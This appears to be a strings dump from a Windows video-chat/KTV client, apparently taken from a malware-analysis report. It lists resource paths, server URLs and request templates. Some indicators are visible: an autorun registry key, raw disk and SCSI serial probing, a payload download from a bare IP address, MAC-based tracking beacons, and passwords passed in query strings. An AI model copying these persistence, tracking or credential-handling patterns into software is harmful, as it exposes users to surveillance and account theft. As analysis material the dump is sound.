useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e
rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................
%f*%d = %d
//player.ini
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
filter.zip
serverlist.txt
car.xml
flower.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
UserLoginToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginError
RoomPass
AdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
help.xml
sysmessage.xml
skinres\TG\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
VideoOut30.ocx
VideoIn30.ocx
9158KTVAudioOut.ocx
9158KTVAudioIn.ocx
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:%s^|$|^%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
lobby.ini
skinres\skin.ini
//HallClose.ini
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
%s?url=%s
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
/active/userinfor/userview_up.aspx?useridx=%s|viewid=%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LoginCount
LastLoginType
SOFTWARE\9158web
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
%s
%d
%s %s%s%d
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content:
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
%s%H:%M:%S%s\%s.loghXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%shXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktvhXXp://room.9158.com/ktv_new/free_mic.aspx?userid=hXXp://room.9158.com/ktv_new/song_in.aspx?userid=&r=%ddance_room_new/click_save.aspxhXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%shXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d9158.comtiao58.comSOFTWARE\t58web&userid=%s&intype=2&type=%s&type=%s//skinres//MoneyRestPass.bmp'>#sel1##p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'">#p2#
#p1#
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s%s-%s|HistoryRoom.xmlhXXp://room.9158.com/ktv_new/lately_room.aspx?r=hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next 'href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '')){window.external.OnHistory_Showinfo(4,#pa#);}"\skinres\fav\sel1.gif' style='border:none;'>hXXp://room.9158.com/images/newten/go-home.gif#purl#hXXp://room.9158.com/ktv_new/head1.jpgclass='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"\skinres\fav\sel2.gif' style='border:none;'>iexplore.exehXXp://cugame.9158.com/active/app/load.htmlogin=hXXp://VVV.9158.com/client/login/loginback.aspx?skinres\RankRate.bmpskinres\Hall\SearchRoomTopRight.bmpskinres\Hall\SearchRoomTopLeft.bmpskinres\Unknown.jpgskinres\scroll.bmp\Game\ddvGame.iniSkinRes//none.bmpSkinRes\TreeStatus.bmpSkinRes\Hall\searchRoombtn.bmpSkinRes\Hall\headbutton.bmpSkinRes\Hall\MiniInfor.bmpSkinRes\Hall\bag.bmpSkinRes\systemCenter.bmpSkinRes\set.bmpSkinRes\mybank.bmpSkinRes\vip.bmpSkinRes\systemSet.bmpSkinRes\systemReg.bmp\SkinRes\IMToolBar.bmpHead\era.bmpHead\crown.bmpHead\topestpurple2.bmpHead\topestpurple.bmpHead\DiamondPurple2.bmpHead\DiamondPurple.bmpHead\queenPurple2.bmpHead\queenPurple.bmpHead\Purple2.bmpHead\Purple.bmpHead\purplevip2.bmpHead\purplevip.bmpHead\level15.bmpHead\redvip.bmpHead\0_bluevip.bmpHead\paliesman.bmponclick="window.external.OnclickHead('1')">hXXp://Head\user_photo.bmpHead\H5_2.bmpHead\H5_1.bmpHead\H4_2.bmpHead\H4_1.bmpHead\H3_2.bmpHead\H3_1.bmpHead\H2_2.bmpHead\H2_1.bmpHead\H1_2.bmpHead\H1_1.bmpHead\H0_2.bmpHead\H0_1.bmp-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"%Y%m%d%s\%d\%sSkinRes\BtnMinInfor.bmpSkinRes\BtnCloseInfor.bmp%s&uidx=%sSkinRes\brInfor.bmpSkinRes\blInfor.bmpSkinRes\trInfor.bmpSkinRes\tlInfor.bmp%s %s%d||%d||%d||%s.img50 { width:50px; height:50px; text-align:center; }div.img50 img { max-width:50px; 
max-height:50px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
' target='_blank' onFocus='this.blur()'>\guestlogin.iniSkinRes\TG\QRCode.bmpSkinRes\TG\mins1.bmpSkinRes\TG\closes1.bmpLogin_GuestHall_LoginCancelHall_LoginOKHallLoginRegLogin_WeiboLogin_AlipayLogin_QQLogin_idxLogin_UserGuestLogin_TuiGetLoginNodeData.aspxdl.week8.netplatname=%s&userid=%s&loginip=%s&loginport=%d/Error.txtCLoginDlg m_nLoginType!=nTypehXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspxSysMsgCloseBtnskinres\login.gifhXXp://VVV.9158.com/?code=SkinRes/IeClose.png%H : %M %Y/%m/%dnIDKeyMsgCloseBtnceleburltaurlrelogingourlSockClient.dllMulti*.dll.PAVCObject@@.PAVCException@@.PAVCFileException@@%sBugReport.exe ,%sFlags:XDS:X ES:X FS:X GS:XSS:ESP:X:X EBP:XCS:EIP:X:XEAX:XEBX:XECX:XEDX:XESI:XEDI:XFault address1: X X:X %sException code1: X %s//build4.5%d-%d-%d %d:%d:%d***************************************************NTDLL.DLLFLT_INVALID_OPERATIONFLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmin.bmp
SkinRes\buttonclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&psw=%s&useridx=%s
%s&r=%d
{6C9A41B3-ABB2-45f7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\phone.bmp
SkinRes\lock.bmp
SkinRes\key2.bmp
SkinRes\key1.bmp
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://pay.9158.com/v/ips/NetPay_vip.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
%s
/active/userinfor/get_userview.aspx?useridx=%s&r=%d
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');SkinRes\X2.bmphXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=